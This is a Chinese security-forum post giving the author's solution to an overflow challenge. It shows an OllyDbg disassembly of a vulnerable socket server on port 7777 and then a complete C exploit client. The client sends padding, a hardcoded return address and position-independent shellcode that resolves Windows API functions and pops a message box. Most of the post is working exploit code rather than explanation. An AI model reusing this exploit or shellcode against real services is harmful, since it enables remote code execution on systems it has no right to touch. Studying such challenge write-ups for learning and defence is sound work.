提交时间已经过了,那么我就可以发帖子混篇精华了。首先我声明,溢出我是个门外汉,答案不一定正确,仅供参考。
首先看A题,打开OD,看到EP处的代码
不用怀疑,它是标准的VC6.0生成的.OK,水话说完了 .
我们直接来看看main()函数的代码.
004010B0 /$ 81EC B4030000 sub esp, 3B4
004010B6 |. 8D8424 240200>lea eax, dword ptr [esp+224]
004010BD |. 55 push ebp
004010BE |. 50 push eax ; /pWSAData
004010BF |. 68 01010000 push 101 ; |RequestedVersion = 101 (1.1.)
004010C4 |. FF15 BC804000 call dword ptr [<&WS2_32.#115>] ; \WSAStartup
004010CA |. 6A 00 push 0 ; /Protocol = IPPROTO_IP
004010CC |. 6A 01 push 1 ; |Type = SOCK_STREAM
004010CE |. 6A 02 push 2 ; |Family = AF_INET
004010D0 |. FF15 C0804000 call dword ptr [<&WS2_32.#23>] ; \socket
004010D6 |. 8BE8 mov ebp, eax
004010D8 |. 85ED test ebp, ebp
004010DA |. 7D 33 jge short 0040110F
004010DC |. 68 00914000 push 00409100 ; ASCII "socket creating error!"
004010E1 |. 55 push ebp ; /Arg1
004010E2 |. B9 689A4000 mov ecx, 00409A68 ; |
004010E7 |. E8 0C070000 call 004017F8 ; \exploit_.004017F8
004010EC |. 8BC8 mov ecx, eax
004010EE |. E8 34030000 call 00401427
004010F3 |. 68 D0124000 push 004012D0
004010F8 |. 6A 0A push 0A ; /Arg1 = 0000000A
004010FA |. 8BC8 mov ecx, eax ; |
004010FC |. E8 DF010000 call 004012E0 ; \exploit_.004012E0
00401101 |. 8BC8 mov ecx, eax
00401103 |. E8 A8010000 call 004012B0
00401108 |. 6A 01 push 1
0040110A |. E8 430E0000 call 00401F52
0040110F |> 68 611E0000 push 1E61 ; /NetShort = 1E61
00401114 |. 66:C74424 0C >mov word ptr [esp+C], 2 ; |
0040111B |. FF15 C4804000 call dword ptr [<&WS2_32.#9>] ; \ntohs
00401121 |. 6A 00 push 0 ; /NetLong = 0
00401123 |. 66:894424 0E mov word ptr [esp+E], ax ; |
00401128 |. FF15 C8804000 call dword ptr [<&WS2_32.#8>] ; \ntohl
0040112E |. 8D4C24 08 lea ecx, dword ptr [esp+8]
00401132 |. 6A 10 push 10 ; /AddrLen = 10 (16.)
00401134 |. 51 push ecx ; |pSockAddr
00401135 |. 55 push ebp ; |Socket
00401136 |. 894424 18 mov dword ptr [esp+18], eax ; |
0040113A |. FF15 CC804000 call dword ptr [<&WS2_32.#2>] ; \bind
00401140 |. 85C0 test eax, eax
00401142 |. 74 24 je short 00401168
00401144 |. 68 E0904000 push 004090E0 ; ASCII "binding stream socket error!"
00401149 |. B9 689A4000 mov ecx, 00409A68
0040114E |. E8 D4020000 call 00401427
00401153 |. 68 D0124000 push 004012D0
00401158 |. 6A 0A push 0A ; /Arg1 = 0000000A
0040115A |. 8BC8 mov ecx, eax ; |
0040115C |. E8 7F010000 call 004012E0 ; \exploit_.004012E0
00401161 |. 8BC8 mov ecx, eax
00401163 |. E8 48010000 call 004012B0
00401168 |> 53 push ebx
00401169 |. 68 B8904000 push 004090B8 ; ASCII "**************************************"
0040116E |. B9 689A4000 mov ecx, 00409A68
00401173 |. E8 AF020000 call 00401427
00401178 |. 68 D0124000 push 004012D0
0040117D |. 6A 0A push 0A ; /Arg1 = 0000000A
0040117F |. 8BC8 mov ecx, eax ; |
00401181 |. E8 5A010000 call 004012E0 ; \exploit_.004012E0
00401186 |. 8BC8 mov ecx, eax
00401188 |. E8 23010000 call 004012B0
0040118D |. 68 94904000 push 00409094 ; ASCII " exploit target server 1.0",TAB," "
00401192 |. B9 689A4000 mov ecx, 00409A68
00401197 |. E8 8B020000 call 00401427
0040119C |. 68 D0124000 push 004012D0
004011A1 |. 6A 0A push 0A ; /Arg1 = 0000000A
004011A3 |. 8BC8 mov ecx, eax ; |
004011A5 |. E8 36010000 call 004012E0 ; \exploit_.004012E0
004011AA |. 8BC8 mov ecx, eax
004011AC |. E8 FF000000 call 004012B0
004011B1 |. 68 B8904000 push 004090B8 ; ASCII "**************************************"
004011B6 |. B9 689A4000 mov ecx, 00409A68
004011BB |. E8 67020000 call 00401427
004011C0 |. 68 D0124000 push 004012D0
004011C5 |. 6A 0A push 0A ; /Arg1 = 0000000A
004011C7 |. 8BC8 mov ecx, eax ; |
004011C9 |. E8 12010000 call 004012E0 ; \exploit_.004012E0
004011CE |. 8BC8 mov ecx, eax
004011D0 |. E8 DB000000 call 004012B0
004011D5 |. 6A 04 push 4 ; /Backlog = 4
004011D7 |. 55 push ebp ; |Socket
004011D8 |. FF15 D0804000 call dword ptr [<&WS2_32.#13>] ; \listen
004011DE |. 8D5424 08 lea edx, dword ptr [esp+8]
004011E2 |. 8D4424 1C lea eax, dword ptr [esp+1C]
004011E6 |. 52 push edx ; /pAddrLen
004011E7 |. 50 push eax ; |pSockAddr
004011E8 |. 55 push ebp ; |Socket
004011E9 |. C74424 14 100>mov dword ptr [esp+14], 10 ; |
004011F1 |. FF15 D4804000 call dword ptr [<&WS2_32.#1>] ; \accept
004011F7 |. 8BD8 mov ebx, eax
004011F9 |. 83FB FF cmp ebx, -1
004011FC |. 74 7F je short 0040127D
004011FE |. 56 push esi
004011FF |. 57 push edi
00401200 |> B9 80000000 /mov ecx, 80
00401205 |. 33C0 |xor eax, eax
00401207 |. 8D7C24 34 |lea edi, dword ptr [esp+34]
0040120B |. 50 |push eax ; /Flags => 0
0040120C |. F3:AB |rep stos dword ptr es:[edi] ; |
0040120E |. 8D4C24 38 |lea ecx, dword ptr [esp+38] ; |
00401212 |. 68 00020000 |push 200 ; |BufSize = 200 (512.)
00401217 |. 51 |push ecx ; |Buffer
00401218 |. 53 |push ebx ; |Socket
00401219 |. FF15 D8804000 |call dword ptr [<&WS2_32.#16>] ; \recv
0040121F |. 8BF0 |mov esi, eax
00401221 |. 85F6 |test esi, esi
00401223 |. 7D 26 |jge short 0040124B
00401225 |. 68 74904000 |push 00409074 ; ASCII "reading stream message erro!"
0040122A |. B9 689A4000 |mov ecx, 00409A68
0040122F |. E8 F3010000 |call 00401427
00401234 |. 68 D0124000 |push 004012D0
00401239 |. 6A 0A |push 0A ; /Arg1 = 0000000A
0040123B |. 8BC8 |mov ecx, eax ; |
0040123D |. E8 9E000000 |call 004012E0 ; \exploit_.004012E0
00401242 |. 8BC8 |mov ecx, eax
00401244 |. E8 67000000 |call 004012B0
00401249 |. 33F6 |xor esi, esi
0040124B |> 8D5424 34 |lea edx, dword ptr [esp+34]
0040124F |. 52 |push edx
00401250 |. E8 ABFDFFFF |call 00401000
00401255 |. 83C4 04 |add esp, 4
00401258 |. 85F6 |test esi, esi
0040125A |.^ 75 A4 |jnz short 00401200
0040125C |. 53 |push ebx ; /Socket
0040125D |. FF15 DC804000 |call dword ptr [<&WS2_32.#3>] ; \closesocket
00401263 |. 8D4424 10 |lea eax, dword ptr [esp+10]
00401267 |. 8D4C24 24 |lea ecx, dword ptr [esp+24]
0040126B |. 50 |push eax ; /pAddrLen
0040126C |. 51 |push ecx ; |pSockAddr
0040126D |. 55 |push ebp ; |Socket
0040126E |. FF15 D4804000 |call dword ptr [<&WS2_32.#1>] ; \accept
00401274 |. 8BD8 |mov ebx, eax
00401276 |. 83FB FF |cmp ebx, -1
00401279 |.^ 75 85 \jnz short 00401200
0040127B |. 5F pop edi
0040127C |. 5E pop esi
0040127D |> 68 64904000 push 00409064 ; ASCII "accept error!"
00401282 |. B9 689A4000 mov ecx, 00409A68
00401287 |. E8 9B010000 call 00401427
0040128C |. 68 D0124000 push 004012D0
00401291 |. 6A 0A push 0A ; /Arg1 = 0000000A
00401293 |. 8BC8 mov ecx, eax ; |
00401295 |. E8 46000000 call 004012E0 ; \exploit_.004012E0
0040129A |. 8BC8 mov ecx, eax
0040129C |. E8 0F000000 call 004012B0
004012A1 |. FF15 E0804000 call dword ptr [<&WS2_32.#116>] ; [WSACleanup
004012A7 |. 5B pop ebx
004012A8 |. 5D pop ebp
004012A9 |. 81C4 B4030000 add esp, 3B4
004012AF \. C3 retn
// exploitA.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include <windows.h>
#include <stdio.h>
#include <winsock.h>
#pragma comment(lib, "wsock32.lib")
BYTE shellcode[0x200] =
{
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xED\x1E\x96\x7C"
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x6F\x68\x6F\x0A\x68\x62\x75\x67\x68\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
};
int _tmain(int argc, _TCHAR* argv[])
{
WORD version;
WSADATA wsaData;
int rVal=0;
version = MAKEWORD(1,1);
WSAStartup(version,(LPWSADATA)&wsaData);
LPHOSTENT hostEntry;
//store information about the server
hostEntry = gethostbyname("127.0.0.1");
if(!hostEntry)
{
printf("Failed gethostbyname()");
WSACleanup();
return 0;
}
//create the socket
SOCKET theSocket = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if(theSocket == SOCKET_ERROR)
{
printf("Failed socket()");
return 0;
}
//Fill in the sockaddr_in struct
SOCKADDR_IN serverInfo;
serverInfo.sin_family = PF_INET;
serverInfo.sin_addr = *((LPIN_ADDR)*hostEntry->h_addr_list);
serverInfo.sin_port = htons(7777);
rVal=connect(theSocket,(LPSOCKADDR)&serverInfo, sizeof(serverInfo));
if(rVal==SOCKET_ERROR)
{
printf("Failed connect()");
return 0;
}
send(theSocket,(const char*)shellcode,0x200,0);
return 0;
}
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!